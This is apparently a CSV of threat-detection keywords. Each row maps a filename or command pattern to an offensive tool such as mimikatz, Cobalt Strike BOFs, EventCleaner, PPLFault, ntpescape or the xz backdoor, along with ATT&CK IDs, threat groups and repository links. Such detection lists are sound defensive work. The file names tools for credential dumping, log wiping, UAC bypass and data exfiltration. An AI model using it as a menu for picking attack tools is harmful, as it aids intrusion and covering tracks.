"*europe.equihash-hub.miningpoolhub.com*",".{0,1000}europe\.equihash\-hub\.miningpoolhub\.com.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","1","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","43296"
"*eval $zrKcKQ*",".{0,1000}eval\s\$zrKcKQ.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","N/A","rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","10","10","N/A","N/A","N/A","N/A","43298"
"*evallen/ntpescape*",".{0,1000}evallen\/ntpescape.{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","Black Basta","Data Exfiltration","https://github.com/evallen/ntpescape","1","1","N/A","N/A","10","2","138","15","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z","43300"
"*evasion/has_recycle_bin.*",".{0,1000}evasion\/has_recycle_bin\..{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","43302"
"*evasion_shellcode.js*",".{0,1000}evasion_shellcode\.js.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43303"
"*event::drop*",".{0,1000}event\:\:drop.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","43304"
"*EventAggregation.dll.bak*",".{0,1000}EventAggregation\.dll\.bak.{0,1000}","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","N/A","2","140","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z","43305"
"*EventAggregation.dll.bak*",".{0,1000}EventAggregation\.dll\.bak.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","43306"
"*EventAggregation.dll.patched*",".{0,1000}EventAggregation\.dll\.patched.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","43307"
"*EventAggregationPH.dll*",".{0,1000}EventAggregationPH\.dll.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","43308"
"*eventcleaner closehandle*",".{0,1000}eventcleaner\sclosehandle.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","43309"
"*eventcleaner suspend*",".{0,1000}eventcleaner\ssuspend.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","43310"
"*EventCleaner.exe *",".{0,1000}EventCleaner\.exe\s.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","43311"
"*EventCleaner.iobj*",".{0,1000}EventCleaner\.iobj.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","43312"
"*EventCleaner\Debug\*",".{0,1000}EventCleaner\\Debug\\.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","43313"
"*eventlog -risk-i-know*",".{0,1000}eventlog\s\-risk\-i\-know.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","43314"
"*eventlog_dos.exe*",".{0,1000}eventlog_dos\.exe.{0,1000}","offensive_tool_keyword","EventLogCrasher","crash the Windows Event Log service of any other Windows 10/Windows Server 2022 machine on the same domain","T1562.002 - T1489","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/floesen/EventLogCrasher","1","1","N/A","N/A","10","2","186","34","2024-01-23T14:04:23Z","2024-01-23T09:27:27Z","43315"
"*eventlog_fucker.py*",".{0,1000}eventlog_fucker\.py.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","43316"
"*EventLogCrasher.exe*",".{0,1000}EventLogCrasher\.exe.{0,1000}","offensive_tool_keyword","EventLogCrasher","crash the Windows Event Log service of any other Windows 10/Windows Server 2022 machine on the same domain","T1562.002 - T1489","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/floesen/EventLogCrasher","1","1","N/A","N/A","10","2","186","34","2024-01-23T14:04:23Z","2024-01-23T09:27:27Z","43317"
"*EventLogCrasher-main*",".{0,1000}EventLogCrasher\-main.{0,1000}","offensive_tool_keyword","EventLogCrasher","crash the Windows Event Log service of any other Windows 10/Windows Server 2022 machine on the same domain","T1562.002 - T1489","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/floesen/EventLogCrasher","1","1","N/A","N/A","10","2","186","34","2024-01-23T14:04:23Z","2024-01-23T09:27:27Z","43318"
"*Eventlogedit-evtx--Evolution-master-v1.1.zip*",".{0,1000}Eventlogedit\-evtx\-\-Evolution\-master\-v1\.1\.zip.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","1","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","43319"
"*eventlog-fucker.py*",".{0,1000}eventlog\-fucker\.py.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","43320"
"*eventspy.cna*",".{0,1000}eventspy\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","N/A","10","10","316","87","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z","43321"
"*EventSub-Aggressor.*",".{0,1000}EventSub\-Aggressor\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","N/A","10","10","347","57","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z","43322"
"*EventViewerRCE.ps1*",".{0,1000}EventViewerRCE\.ps1.{0,1000}","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","1","N/A","N/A","10","2","184","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z","43323"
"*EventViewerUAC.*",".{0,1000}EventViewerUAC\..{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","N/A","10","10","133","40","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z","43324"
"*EventViewerUAC.*",".{0,1000}EventViewerUAC\..{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/EventViewerUAC_BOF","1","1","N/A","N/A","10","10","131","31","2022-05-06T17:43:05Z","2022-05-02T02:08:52Z","43325"
"*EventViewerUAC.x64*",".{0,1000}EventViewerUAC\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","N/A","10","10","133","40","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z","43326"
"*EventViewerUAC.x86*",".{0,1000}EventViewerUAC\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","N/A","10","10","133","40","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z","43327"
"*EventViewerUAC_BOF*",".{0,1000}EventViewerUAC_BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/EventViewerUAC_BOF","1","1","N/A","N/A","10","10","131","31","2022-05-06T17:43:05Z","2022-05-02T02:08:52Z","43328"
"*eventvwr_elevator*",".{0,1000}eventvwr_elevator.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","43329"
"*-EventVwrBypass*",".{0,1000}\-EventVwrBypass.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 